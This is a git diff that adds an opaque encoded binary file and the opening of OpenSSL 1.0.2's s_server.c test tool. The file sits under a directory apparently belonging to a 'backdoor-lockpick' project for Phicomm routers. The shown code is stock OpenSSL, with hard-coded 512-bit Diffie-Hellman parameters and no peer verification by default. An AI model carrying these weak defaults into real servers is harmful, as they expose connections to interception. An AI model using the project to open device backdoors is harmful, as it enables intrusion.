z(?ADmpd&TVp&IB|4Rn|WIzj^-qJfUlKnH254zN-kV5JgZI>-YZ-+>O~Ku2<*Lpji~
z9Oz&UbTkJ#kOLjnfez?W9nhsZpi6bomg=A_)j?aTgSJ!$ZK)30Qt8Wd(3a|;E!9C=
zs)M#v2W_bi+EVE_rRS8cliEsnc2)JvvZ`?PtXT^x7l!$bjLNXbUrVV?v^9D&=TwL3
zwP$)cqcj%gFBOI7S1zcjp0}V<9pZNm!?ET%dfUqDb(BUe8l)_&zAYN1F@lB;`cg=3
z!}2h{%C2<c&5B>|(M$hf^$tgv2OpI?3)QPlbwJssUjYec$47<o_g(mN4`Kd{fqXC|
zzMS8(@MyIn(wK~TOD2>|(I0}*UlIzdFMB9-UfJBra7%NPUPuO>{>qT1^|CI^iTdU%
z-+{;+(C_Pn%ge(223-cG5B|^#D`9!ZSB=avuE&-|8kf;$NocIrNP>J!V|ym)O5+;+
z9;EUYy*QdV-ew)=S5?%(TKYUeG~7U+kKy`dZ_!&b{K~DEq2Tg4HKEG+>Zo!JQvs9L
zjk12E4-T<$m5Xb_HK$abPW497lG#&LF1eLJebJ`=5D~pGlsU|=qS5?>-|or689=?t
z$g?5!8lEYEykMk67E~_a?^Q|cmCrxDW??nG^+K=B)~e(Bb1m#kdNqj-=yw!7Au3Z<
zAgC>lJ=FxVIhhxCjm0>Z;@4T#Oo-li%gp%nD>o#tqI8^mx+vU4Z+f-Vd2#wIK%~)&
z(}ao=aAwWXmErnU`Y2I^!lI?QKDJEdL$4Oi3YRZj!pD09^a6djzA-|vLX|>aCZdTO
zeUixRkZcQCl4z@KYV{(CmYApBG^|a8`ExB{ep{1|mew~VJpLF>Sc{nC_&F4V>8}kb
za&#59F`bYiHCq6FMUo3_mzUmzTR|Tzu)LtrASWsf$M}mryJIRpuKds#TiO<BTTR`M
z1hn#;DmHa7{GM;z%XScPJ-_xMtt7)Qg4StItJs}CUz(aq9hW-b0_xhJEdx@Y$XyE6
zRdcejQ8xp6*E6hQhK{r*;|)5MaS>%WzieJbSV^haRl9lut?cQ2IIf%-*ZL9|y5cbi
zXq)Ok;8I1JGW8JV4~(d;L*=I4{nXy#2;zXzv-q%iHCS<L6RXrQv6uti(6bIC1~*JT
zX+VN%v+5Kjn-9J4YHGBWzHHIb6sFMQlE%Z_tLZZyGL*j<)l01R5s7LpQXi%StFc6t
zR`{7$U3*E(2XrLL$!&=S-N$m_mBDTNEhz32dGMgHkTWckg)t-BDX@<+Jp{K-9v--}
z<*_Tw>7+wa6`JV@IgebuRxg4+%`)9WoIZR)-vHxXdTEf=)t9+=U&R|EYA7~F>JZ|>
z80Rrpl}>;#HDgbLL8{bnvxVXWJeY7<RAT*+93H{xi(riMAW~l^mMx_-(x~pt2q$kQ
z+UTD;NFQua>&#e0mBp{EYH1}W!ylibCh6-IZF;~n?`YC{*Yw(?$BkWLi)IqkT<MDh
zrowfhm8-(BmfA$4N9Uv_UfF!LYaG&hEXUg7?M!8GC1=`pORL^iqXd5|an|YKnzH$2
zbA>{->o$~0lGQQYxI(IH=+lanO>JW|LSKDUUZA&~`8{#9ot^2hgLPNVT}N|^*A`hR
zGb9>2_``Cnquk0zRQS;Wdebu;rf!a7S<SLED>Ld+q;qTL`)x)1hZcUUi{E*o50k28
zJcG3GW6wv@&)_F9NQ-(5jNXAT_*@MuzE9f*UnIEAuLGRlIWqjX;GFMK^fNfWC&!De
zvr)qe?+-fH2+leq>1T9)0ergcn8AMw_yEA~6`XaBrk~NdANZ*A2;ls#nBo5&@Iio2
zqHSJSzmR^0UoSY9cQ4?t1U?@#^|Ti7QJ}LPbOwXYwSc2N+d+r*xy-!0Y~d!~Hvm6|
zc*g$s03QwbM}o6<9&H=`7r@7I?Z=Lxg)x4|&hU>EoL9)_|GAVGn?DcuW9YciS>WI|
z0X_useFSiRC(h_R5BkS~zJ4!3+k@pb?@w{E<ADD@=nn<`0qVJCtuqYpeE{co4UIjA
z0$u=k5#VUgB*0PsB*2G*j(&b$+k^V&2%n2_Jd~>zbTHo-@VU;)>Bq|o;G;d?2Yg?!
zhyNR2UO3;e^fP|A4)~bwt$^<bI)4Hk?i-EH!@x(KZNNwS_4DuAKWOJ`po8`GFTl~C
z{aKV2E>|)Aj6H(|=M~yh065myk$|IqvEZzK0_cweKI%^cehKhrIr#Gc=XYL>{YwGI
zIBx=deuvxe&HGb)811>(p<~{M;=>p}w*Vjg@Ce}8&pahK`v?1tzd87?0>2dO*Uwq^
z?Fab3`R0XJ{4T92uYNvS*ZVj+X7Iz*bD({7W(m%Aa^GzD)xgJcEd@T7YdPQ(KxeH(
z$Gq3W_M`sIpo99iJ9PB(yt-Tmf*;KLJFI^Y;E#jO!GP}od<5Vx0nYCx8~?lk_#uGn
z=X16HCxRc$dq8Xt#-V-=SKEIm=;-Hgwaz5aIhdY*<b~^t-x)Xdj1=6~KMwH2Kwm#s
ztMlb|#Es4j;2#0FetuTx%l}uI;hzS4ELR=iM}kfZ;6C811?O_{f6!|5^>eR%<MvX}
zISO>H1svz4H-i2s(7zpU{>FpJ_in(a0sd#u$MQY}e69oYc<rme=XdUnK0n{e3zwJq
z<}uw50q2kO8~$gYgZU1j=QMd?4QxjT3C{Z1j*f8f#{zyd*f||^P9!a3PX+MNo<)G8
zJrU4BdtwfL8}Rwu!Q{IJ_?T}y;DuoSk3nY!==>b`sB;V8qd?~lz>fj^9?<7H;27fN
z5x~o6-`M{o=wQCj0-tp_=6HDt@R_u4bl!64yaRlm8W{d(fR_XQl|yG>9+7C__(7fF
zfLG8lqko{_Y&(BL!r)_okL8*SIO_BBzq~Ma4CtH#{7O1z^qT;m1voz!%nR$FpDzUd
zY&vFi)&q|AnD-EEotuF_26TQaxXr&C@MED|{CqJl>}Q;RJ_dZW{~5rK1D!VjKOXQe
z0mt*TLV0eM?HmjI696v)yaI6SS0jS6{l&m<06av;jGtRT2g`LQ@aF)ZpU>rm?JNO(
zeh!xx#sk173U2J7|G-2o^gmUog>g=^Q15#5-7K{j+!y>*3pd}SI@7{ygiqfuRg2N7
z5S%_s*9)H^_!_|Z8!E;>>jh^U#{qsR@X^mdbl_Km&Unyy5AX?q52oigdEtB~0)CJK
zA1yeSm&<DG9}9f!2j)8Xr#bjd4*p69e*^H*KUV>MGT3<o=wKYa27JE8@~OnnJAh9H
z{1d?0cT4EU%RG8Mkr(#QDfBb`IYV&f^0#XY{zKqb0sk5Y|3Sc~g3j}xGZ%Dr0Uz@{
zgr3Xeh3)w+=o}+B+dq$f#?E5kqmFsMm37dbvp|QB9Zf%8ngM4&8~qCb$9ilByqeM*
zey8B9jrI5w;By-_{Of^__M7)@xxD=CF2mpH;OEoxZoDvmKK%^;Ai>!l)E@=>1;8(I
z@FT$IzRKvw9Q>aHpRb)7{w)svUjUy5{@(>Ui$P~M@UdLO>G?HYxV)${PH^@Q*5j$b
zpAPvp0RJ>fW9;YW>3FgIc`5Ku1RZ{!ju+0C+oI9A$)R%>@J|Ar2LV4FbRKo+YzIEu
zYQ~Fa0Z0880cU<8{dn08IQs1?!I?V)?A%-4gSP!#C^+-WfPXUZ&!A(*KZ}8n^&18L
znZR#y@YewUEa100_#1(be)tLC{LMUL=k*SqUjv_YeERWn7vSg6zR|hgq4OB<S;y4l
zbAX3I=kE@kH1Ju+j0+zDelF;I>ChQ0@1b-3vW}Uz><@SZbPg4qxmb^*fX~Nj=*LR{
z_)^+8{+Z&?DF;65@L0u5HQ=?hZ*)#`=tO|eIy^_@r3vsl+BZ5$ht3Vaj{@Jk*U#EB
zA^z_KJ|E*bH!t0Q*VDeqcdH}c9l&Ru3KpT|Wx$uwzR`Kpq4N>&8-V|%gFjT>>*sig
z0sjEO*%qw#!vQY`KO6%(=YdW!@KI+H;QVbpQ?6N{vmA8h0Uvcv1H2M+&IO%D&}jfZ
z>YNYwEYP_CbecftV&J3B4}sqd{A(Qi#{tLj?j_J^0i8F1kNJ)|fJn4(J+{)%__IiG
zyB^O2{`tUfbMSu${5Ig<<KRCE{5bIc)4|V|?+LK|3E&?jxNZMp;3t89j)Q+4@K*r;
zRtNts;I9P!{SN+@z+VOYLGrx<+x|+yxxA}^Ki9$U0{#WSzskYi0erq^ZQ|ht2mfHX
zz{vKj0sfJK+xB+?j`Q<BfzE}X^Dyu+ZvO&&&V$EzUj7F7TG}`Eo9`Rg_6#4PlBxK=
z2>8C>Hva_RuLJ%h2Y(juzYqL*4*uD|zZm#Y2R{M)^}t`_;9m{=cHrOO;J*a?4&cAx
z;E((ck!ay~*g!wy|KkL={dqR<XG8xP1N;Y|bG}38X5e!k)9A;`9e`g#`^KJo9Xe^i
zF+Se~9lS0#;1HFKDlg8HhXI~~d=C(uZN&4$y8sV?A2tC#2k=KhpS7fW^j-uU?RgFG
zOTnIhfIiyuKJZcJQ^3c7PLD%puS1DM3&#WM3<JEAj+uHnKyceXhXNmUMgo2r=p5_N
zDFHs}OaZ(LbY=jK*8^t*z7hCUg4^~l06yk>2H=;2PQ;<p0DRPG0sIQkS>e#R5csIm
z4)_m2r_-VHBjBUXHGuyJbZ&6y{1W)6^IO1w3_5o?bnXK_>O2him7w#uL+2^rqt5ey
zUj;gUcj&wceAIad@P7lH4;?!H1$@-$FDHiFzJ3Badkb#I;c(!i&cT3R4LV0SbVdOm
zb;bgI4d{$>=u8DZ>XZZiQ_u-HbgF@mI*S3n7Ie;b=+prpb(RDEGtg;s=&S}l>Z}9&
z=b-Zght5Xeqs~=;Uk5rrbLiXzeAKxO@asY6_YR$VfsZ;50Dc4LJnGQ-3-D3r8Nh!5
zIy)UYuL2)+(tzIxI`27jJ^?=Jd<FPTpfl)j+M&g6Uqc1A$GiOjznRjR@$L|Z&QZWe
zd&U5M3+SBS(3uE))R_+Wt)Nrk&^ZP8s52k%UxLo*4xMv>k2=c${}t#oJ9Lu3N1Zi*
z{~C1GJ9I7uKI;4!@Y_J=YKPACz(<{10snW<`He&8PT-@?p8&rdbRKf(Yy&>(YzO=|
zp!1wV=Vjod&KrRL7IfZr===-#sPj4CzXP3qN6-!}cKgZ`+-_e5fZsvsO#3>>p>sI!
z(VjxUe-ApxJ9J8ck2+HT{}0fa;n0~4eAJl-_#Z%LkwfP!;G<40;CF(~c@CZPfsZ<?
z0KW@#E^_E>06yw;0e&~=T<Orc7Wk-hBjERd&aWLhcK{!C?g9K>(An(Jc?9^V^9103
z1f8cHIxhepbzTE}6X@)A=)4Pj)aidDC8mYj%b)0H+QneO?e>)qeAGD*@cTgLFo(|3
zz(<|q0KXq}0*B6I;G@n-fNut!Sq`1Kz(<{hfIk2_XF7D20v~l^fOmsVt3zic@KI+i
z;17aMhePKw;G@ou0e=W|e(KQq1@KYlSAahZI=^%1+zouxxgYQ?ptHrH^Jn0r&JMsI
z0iC}&banwBb>0H}QPBCPL+2ylqs|wAKL$DjeA=PKZeK%u1^2lgvM=CUiDKI6QGm0S
zxz2Np;EeJAO=S3`7Jn!m=jB9St@`9!3HUam7@d;^x9wjHe07Y{@DlUYs*nEn1ZVCk
zVCM!0zYFlkDUGq`M}ph-ybt_817E#-Mf>(V;X6kWNDJ#!fjxoXHh&`U=K_C~gMSg=
zPf#Al{&vur2Rc^)ALHuhz{h-_a`2xA{4bF2OQ2KTFKf?UBZ)){`=JK#0|mGJa2VkK
zNoh>EjshKgk8BL^v0O#K$8wzn_^Dt|wL@ny;7@`*XMzsevlRGf&obbnJuQIG2Yc25
zz5wt}hyK;TUkLnPI{1G8{vzOS0i6GDG2{Oy9Xihfz8(Ct6Lj!;@4JAX2Kpa^4*Km&
zz@GyB!AH{$Ep|K27reh58>d+Ge7c3puIF3$0^yGlob{K0oh5*u4){b%XSV2^XyM}p
zpKamC3w|o#XMp|^!Py>sPBIL9J~mc#8URO~7KhFX;Iodgb1m@C1beOr{4Bul10Af#
z$AEt}@V^559KeSb>Vj}RqR#$+@1SEQK1T@7wqv{<34GKk1U|OM65!)~qUpd7gPrpM
zKNs-RL1!S@v=9AwskLx3Znl9=1avL~9LL{lK?loqBj8U{e#Sq)1|9UzgMcrEe76CP
z&u@PYcrEaUj#9-_?`YNmet_Tu>2MVALxIol@ESXh1O76=X9C^;_*}v5IGGQ8tlzT$
zkAY4r;O7B;8Q{wSze#XA-v@x-2>fROZvy;fz?%X82=t$Udi)&t_?*x1W3>O-&n=*H
zDB!Jtj}_due;nX{g?y)i4#v;PfS(Wg^8s%IycO^s(7(ok-y*ne=k0($3p&3C9kg=`
z@YzSEfBOsI&w<VkhtBiBXPq<Y$IBZQewv28k3c65ei$%X6Idew_<?{Y0Y4mY9CyY5
zz5@7x;OsZf!;EWXz(;#Rf*(iRm7r4t{8fOTX6YM$hJn8t_)&{LoATkM&BCiS?5z=;
z?YRJSQi5}tz6bbEEgfUe^}xq?yT#(4BKh9u;BN;U+x07!j>-2;;A4CL5b!l%{}+H?
z2>3w0`ArL#cP-$D0DckRBLT-aDFGbgWCq~tK&M7<j-Ti0XZq)}fRF8~32=NL=R&|y
zza8}d2KrY3|NCIiJ%FSB1At!){Ko*tes721c7O6Wz+V7+c7YC-_buS>1pfOD{(xhN
zL<`p=e`~_{vjgyUz^?_o1Mmk0H|_dRrRsTq1{~)DI{<%?xF+A{Kp)RvUIsquyb1gb
zV9)!&=dzjjAIuGx7TeGJ0{#*mH};GWoHfwT#{nPp1HfMfooNo83c!B=_E!Op?QS99
z*zV2-{1VWK0*?Gfz*E4#4)99>|98MU0sjxdZGZj|@V|o}9s(Wo=XSu+{ucp9J9mRV
z`u}~vcR{}W<wVA=$3p?X49az!;C8uA06xy&zAHFq-vv75z~2b?$)L|Rne(H?7H;A;
z3OYDm`~q-nzrO;VSHKVV10Vb6#{kFv`LBRu|NI8v*nhq)IQ#8Y$oFI5W4#ZSg0l~>
z|2!CQ)IUOS*2n(&IN)RdyZ~_2KNE25pKAff{<&FjJ06mNzXs)913FmV^}v4}_*ViS
z>*Z&FW4+u4IM&N1z|n8d0git7JK*Stw*W^!{8MoD!y91#up-)_h4DA(XZp{B1-IMX
zXuvUUi$Uit(3uW=tlv4n-wpgz9sH%hPXoUZ_*h?S0Y^J81)YC@&egz2JGTIi?e{eY
z{w3%~LBD@7?a;#h#Ph5J03QYYOd;Tx10Dd5^*d8=JI?0-zK8NQ^;-iv=(h`j&$gO=
ztPA)!-dzPaj#JkGehJurE8xig4d6IlJS;eu3+;Ix_*Z~_kHsHK>3G@u1ifaBV}XAV
z;6DU>4B*EBK2dNUFYx;6Nx=UR@J|K&D8SDJ9n?P$_^7i6aI}9T;6DcaYXQF!@ZSJ_
z72pp5{%?Rk3;0g}-vv0@^9kU{?^lxB|N8@u{6hgp{gHy(@h}$n*e>V;^J+1C+4WAe
zaOobsDu>Pji!al1@7KV;8vL^baGZy~2srj9yFnl4$?pRGHkHJ*-;Y5D+wb5Y>t}3V
zqa64tfL{alp9T0&0dEwX{dox3^E<$?o!$-jJHWpm^wIw3fR8#a1O89Y+3nC7SV|;X
z*v@z9XZ%(O_<MlUm*myLdEz{oJ~6Hq)_I?PMrS7ASYLBM2g|j{!9NH1I4?aP_;|g2
z1@Nzhdb!ZSzuLk7Bj7&+ovonr0hISiz_DJQ1syE!Yk*@Me&)arksB+l{d2JAc)&3Z
zPZZq5p}f}NeGhQ7^J2jN1?9S2aOR@@Hvu1YZU_8B(D}VXXAkf{0{#bpqyA?OodGfs
zGZ*7?Z^79Qe9WA`?+ZA_=iz{V4EBr!eLR1skKC(;^*;eVeUD!)oG1FN0{B?2Qvm-I
zbQS`RcAgIU*e;qJ`~=`1fc{$0K|AjP{&f&<n}Cn)>p=(qMF)SM3CcaHPOb<2X2DI|
zN^<W4z$?K1?*slB;2S{y2GG9>aLo7Tpu_dz(~p<!fTRDP1N?L1nSSqO&_{p13HUF-
z9&e(`rq6Yo!GQl4=;sS=$JLR5<G5K4I#`b(;A1^jJNRch_#1$a{cxv)|04(gItTx8
zz_FkFn*$#(N&A!igZ%v*_*}qmgnBsxaO_Vaf^&R+0rm1z;12>FZH*phIn8<)kNFs5
z{97#jejbCg82m-yn|Zpy?-hKwrf2y3ip~KRUM9F12aL`r!R2xIjLstIXMIa&ku=Cc
z3;&hy&AiX(w+n9Oj|Tr#aG9oM@;ylOO}jUI)8E<lh#8sh4H!Pp1$ntluQK{~P~GtI
zj9z8%4o*l*i5xdN`|quBzUR)1!Oi~*>lMdWHzguVX`N`(>jtyc7Hy0aC-^J##dVQH
z#4BDJk9);!Exg0@pqT!zA4SrbS6tiD)WrX5NpW*aB3e9q-l8J)-;&7wvgTwlebl~{
zKA*i>5=I;7qu!AwK9m06TYO5+Mcm7hnIZdskoY!-#T{l>jjP<|W@He(vF=j6-nvAu
zhtZ1Dnm9M{$hYknA3#4`K7@9KIOl~6#}{kb>D5Op39mykZJTyuU~W#FzcdE}>yKd4
z-ciO-IbzCh)|G_wwuF(e=o@o2dUI9=(Ho}x2A)A1x%?O6i*K~lNJi{Gt|OD)m^GI$
zrkM6bn`&v6{N*yGffbi`jQxvYJ42$4Ya~5lylv7Myq-1&)6Xvd4U*nBL|GgA4ZM~%
zSkq45E$N@PGPKjLrnI^IclGN!hb#2TWB=_#Ka<}0FIV22<m&nSm%bk&_Y3oB`z!j{
p>A9Qe6MKa1V#8?p`Eb29f34!s{}r4&{TRL&Ny{aAmHBI@|6l!a2WJ2P

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_server.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_server.c
new file mode 100644
index 0000000..baa2455
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/apps/s_server.c
@@ -0,0 +1,3408 @@
+/* apps/s_server.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ * ECC cipher suite support in OpenSSL originally developed by
+ * SUN MICROSYSTEMS, INC., and contributed to the OpenSSL project.
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+/*
+ * Until the key-gen callbacks are modified to use newer prototypes, we allow
+ * deprecated functions for openssl-internal code
+ */
+#ifdef OPENSSL_NO_DEPRECATED
+# undef OPENSSL_NO_DEPRECATED
+#endif
+
+#include <assert.h>
+#include <ctype.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <openssl/e_os2.h>
+#ifdef OPENSSL_NO_STDIO
+# define APPS_WIN16
+#endif
+
+/* conflicts with winsock2 stuff on netware */
+#if !defined(OPENSSL_SYS_NETWARE)
+# include <sys/types.h>
+#endif
+
+/*
+ * With IPv6, it looks like Digital has mixed up the proper order of
+ * recursive header file inclusion, resulting in the compiler complaining
+ * that u_int isn't defined, but only if _POSIX_C_SOURCE is defined, which is
+ * needed to have fileno() declared correctly...  So let's define u_int
+ */
+#if defined(OPENSSL_SYS_VMS_DECC) && !defined(__U_INT)
+# define __U_INT
+typedef unsigned int u_int;
+#endif
+
+#include <openssl/lhash.h>
+#include <openssl/bn.h>
+#define USE_SOCKETS
+#include "apps.h"
+#include <openssl/err.h>
+#include <openssl/pem.h>
+#include <openssl/x509.h>
+#include <openssl/ssl.h>
+#include <openssl/rand.h>
+#include <openssl/ocsp.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+#ifndef OPENSSL_NO_RSA
+# include <openssl/rsa.h>
+#endif
+#ifndef OPENSSL_NO_SRP
+# include <openssl/srp.h>
+#endif
+#include "s_apps.h"
+#include "timeouts.h"
+
+#if (defined(OPENSSL_SYS_VMS) && __VMS_VER < 70000000)
+/* FIONBIO used as a switch to enable ioctl, and that isn't in VMS < 7.0 */
+# undef FIONBIO
+#endif
+
+#if defined(OPENSSL_SYS_BEOS_R5)
+# include <fcntl.h>
+#endif
+
+#ifndef OPENSSL_NO_RSA
+static RSA MS_CALLBACK *tmp_rsa_cb(SSL *s, int is_export, int keylength);
+#endif
+static int sv_body(char *hostname, int s, int stype, unsigned char *context);
+static int www_body(char *hostname, int s, int stype, unsigned char *context);
+static int rev_body(char *hostname, int s, int stype, unsigned char *context);
+static void close_accept_socket(void);
+static void sv_usage(void);
+static int init_ssl_connection(SSL *s);
+static void print_stats(BIO *bp, SSL_CTX *ctx);
+static int generate_session_id(const SSL *ssl, unsigned char *id,
+                               unsigned int *id_len);
+static void init_session_cache_ctx(SSL_CTX *sctx);
+static void free_sessions(void);
+#ifndef OPENSSL_NO_DH
+static DH *load_dh_param(const char *dhfile);
+static DH *get_dh512(void);
+#endif
+
+#ifdef MONOLITH
+static void s_server_init(void);
+#endif
+
+#ifndef OPENSSL_NO_DH
+static unsigned char dh512_p[] = {
+    0xDA, 0x58, 0x3C, 0x16, 0xD9, 0x85, 0x22, 0x89, 0xD0, 0xE4, 0xAF, 0x75,
+    0x6F, 0x4C, 0xCA, 0x92, 0xDD, 0x4B, 0xE5, 0x33, 0xB8, 0x04, 0xFB, 0x0F,
+    0xED, 0x94, 0xEF, 0x9C, 0x8A, 0x44, 0x03, 0xED, 0x57, 0x46, 0x50, 0xD3,
+    0x69, 0x99, 0xDB, 0x29, 0xD7, 0x76, 0x27, 0x6B, 0xA2, 0xD3, 0xD4, 0x12,
+    0xE2, 0x18, 0xF4, 0xDD, 0x1E, 0x08, 0x4C, 0xF6, 0xD8, 0x00, 0x3E, 0x7C,
+    0x47, 0x74, 0xE8, 0x33,
+};
+
+static unsigned char dh512_g[] = {
+    0x02,
+};
+
+static DH *get_dh512(void)
+{
+    DH *dh = NULL;
+
+    if ((dh = DH_new()) == NULL)
+        return (NULL);
+    dh->p = BN_bin2bn(dh512_p, sizeof(dh512_p), NULL);
+    dh->g = BN_bin2bn(dh512_g, sizeof(dh512_g), NULL);
+    if ((dh->p == NULL) || (dh->g == NULL))
+        return (NULL);
+    return (dh);
+}
+#endif
+
+/* static int load_CA(SSL_CTX *ctx, char *file);*/
+
+#undef BUFSIZZ
+#define BUFSIZZ 16*1024
+static int bufsize = BUFSIZZ;
+static int accept_socket = -1;
+
+#define TEST_CERT       "server.pem"
+#ifndef OPENSSL_NO_TLSEXT
+# define TEST_CERT2      "server2.pem"
+#endif
+#undef PROG
+#define PROG            s_server_main
+
+extern int verify_depth, verify_return_error, verify_quiet;
+
+static int s_server_verify = SSL_VERIFY_NONE;
+static int s_server_session_id_context = 1; /* anything will do */
+static const char *s_cert_file = TEST_CERT, *s_key_file =
+    NULL, *s_chain_file = NULL;
+#ifndef OPENSSL_NO_TLSEXT
+static const char *s_cert_file2 = TEST_CERT2, *s_key_file2 = NULL;
+#endif
+static char *s_dcert_file = NULL, *s_dkey_file = NULL, *s_dchain_file = NULL;
+#ifdef FIONBIO
+static int s_nbio = 0;
+#endif
+static int s_nbio_test = 0;
+int s_crlf = 0;
+static SSL_CTX *ctx = NULL;
+#ifndef OPENSSL_NO_TLSEXT
+static SSL_CTX *ctx2 = NULL;
+#endif
+static int www = 0;
+
+static BIO *bio_s_out = NULL;
+static BIO *bio_s_msg = NULL;
+static int s_debug = 0;
+#ifndef OPENSSL_NO_TLSEXT
+static int s_tlsextdebug = 0;
+static int s_tlsextstatus = 0;
+static int cert_status_cb(SSL *s, void *arg);
+#endif
+static int no_resume_ephemeral = 0;
+static int s_msg = 0;
+static int s_quiet = 0;
+static int s_ign_eof = 0;
+static int s_brief = 0;
+
+static char *keymatexportlabel = NULL;
